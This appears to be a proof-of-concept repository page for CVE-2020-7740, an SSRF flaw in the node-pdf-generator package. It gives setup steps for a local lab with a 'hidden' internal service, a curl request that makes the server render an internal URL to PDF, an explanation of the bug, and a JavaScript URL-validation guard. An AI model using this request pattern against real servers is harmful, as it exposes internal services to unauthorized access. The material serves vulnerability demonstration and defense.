
CVE-2020-7740 PoC — node-pdf-generator input validation vulnerability

Associated Vulnerability
Title: node-pdf-generator input validation vulnerability (CVE-2020-7740)
Description: node-pdf-generator is a web server, written in JavaScript by an individual developer, that generates PDFs from HTML. node-pdf-generator has a security vulnerability that stems from a lack of validation of user input and of sanitization of the content supplied to node-pdf-generator; an attacker could exploit it to craft a URL that is passed on to an external server, allowing an SSRF attack.
Description
An example of CVE-2020-7740
Readme
# CVE-2020-7740

This affects all versions of package [`node-pdf-generator`](https://github.com/darrenhaken/node-pdf-generator). Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a URL that will be passed to an external server allowing an SSRF attack.

[Source](https://nvd.nist.gov/vuln/detail/CVE-2020-7740)

## Quick start with docker

1. Build the container with
2. Run the container with `docker run -p 3000:3000 cve-2020-7740`
3. Notice that we cannot visit [`localhost:3001`](http://localhost:3001) directly
4. Send the request with curl using `curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf`
5. Open `test.pdf` to see the rendered localhost website that was supposed to be hidden.

## Quick start Without docker

1. Clone the project using `git clone {link to be inserted}`
2. Install the dependencies from `https://wkhtmltopdf.org/`
3. Start the server using `node .\NodePdfGeneratorServer`; the server will be running at `localhost:3000`
4. Install the requirements of the hidden python server using `python3 -m pip install -r requirements.txt`
5. Start the hidden server using `python3 HiddenService`; the server will be running at [`localhost:3001`](http://localhost:3001)

## How does it work?

1. A GET request with a body is sent to the server. This can be sent using `curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf`
2. This saves a PDF rendering of the HTML page at `http://www.google.com` to the file `test.pdf`

## Why is it vulnerable?

1. Any URL fed to the server is fetched by the server itself, since that is how it converts the website to PDF.
2. This lets a user forge a server-side request by supplying an internal IP address for the server to fetch.
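As an added example (my own code, not part of this PoC or of the node-pdf-generator project), the server-side check that would close this hole: parse the submitted URL with the WHATWG `URL` class, allow only `http`/`https`, and refuse loopback, private and link-local targets before wkhtmltopdf ever fetches anything. The range list and the function names are my own choices.

```javascript
// Added example (not code from the node-pdf-generator project): an SSRF guard the
// PDF service could apply to each URL before handing it to wkhtmltopdf.
// Assumes Node.js 10+ (WHATWG URL class, optional catch binding); no dependencies.

// IPv4 ranges the renderer must never be pointed at: loopback, RFC 1918, link-local
// (which includes the 169.254.169.254 cloud metadata endpoint), CGNAT, "this" network.
const BLOCKED_V4 = [
  ['127.0.0.0', 8], ['10.0.0.0', 8], ['172.16.0.0', 12], ['192.168.0.0', 16],
  ['169.254.0.0', 16], ['100.64.0.0', 10], ['0.0.0.0', 8],
];
// The WHATWG parser always serialises IPv4 hosts in dotted-decimal form, so this
// regex is enough here; hex/decimal/octal forms such as 0x7f000001 arrive normalised.
const DOTTED_V4 = /^\d{1,3}(\.\d{1,3}){3}$/;

function v4ToInt(ip) {
  return ip.split('.').reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

function inV4Range(ip, [base, bits]) {
  const mask = (0xffffffff << (32 - bits)) >>> 0;
  return ((v4ToInt(ip) & mask) >>> 0) === ((v4ToInt(base) & mask) >>> 0);
}

function isBlockedHost(hostname) {
  const host = hostname.toLowerCase();
  if (host === 'localhost' || host.endsWith('.localhost')) return true;
  if (DOTTED_V4.test(host)) return BLOCKED_V4.some((range) => inV4Range(host, range));
  if (host.startsWith('[')) {                        // IPv6 literal, e.g. "[::1]"
    const v6 = host.slice(1, -1);
    if (v6 === '::1' || v6 === '::') return true;     // loopback / unspecified
    if (v6.startsWith('::ffff:')) return true;        // IPv4-mapped: block conservatively
    return /^f[cd]/.test(v6) || /^fe[89ab]/.test(v6); // ULA fc00::/7, link-local fe80::/10
  }
  return false; // a DNS name: resolve it and re-check the answer before fetching
}

// Returns { ok: true, url } with the canonical URL, or { ok: false, reason }.
function validateRenderUrl(input) {
  let url;
  try {
    url = new URL(String(input).trim());
  } catch {
    return { ok: false, reason: 'unparseable URL' };
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return { ok: false, reason: 'scheme not allowed' };
  if (url.username || url.password) return { ok: false, reason: 'credentials in URL' };
  if (isBlockedHost(url.hostname)) return { ok: false, reason: 'internal host' };
  return { ok: true, url: url.href };
}
```

A literal-address check alone is not sufficient: a public hostname can resolve to an internal address and a fetched page can redirect, so the resolved address and every redirect target need the same check.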

## More information on CVE-2020-7740

1. [Vicarius.io](https://www.vicarius.io/research-center/vulnerability/cve-2020-7740-id264841)
2. [NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-7740)
3. [Original Repository](https://github.com/darrenhaken/node-pdf-generator)
File Snapshot

[4.0K] /data/pocs/42ea0aca73f76b85fac1d068e3a68d90deca071a
├── [ 535] Dockerfile
├── [4.0K] HiddenService
│   └── [ 179] __main__.py
├── [1.0K] LICENSE
├── [4.0K] NodePdfGeneratorServer
│   ├── [ 211] conf.js
│   └── [ 872] index.js
├── [ 287] package.json
├── [4.6K] package-lock.json
├── [2.1K] README.md
├── [   6] requirements.txt
└── [  81] start.sh

2 directories, 10 files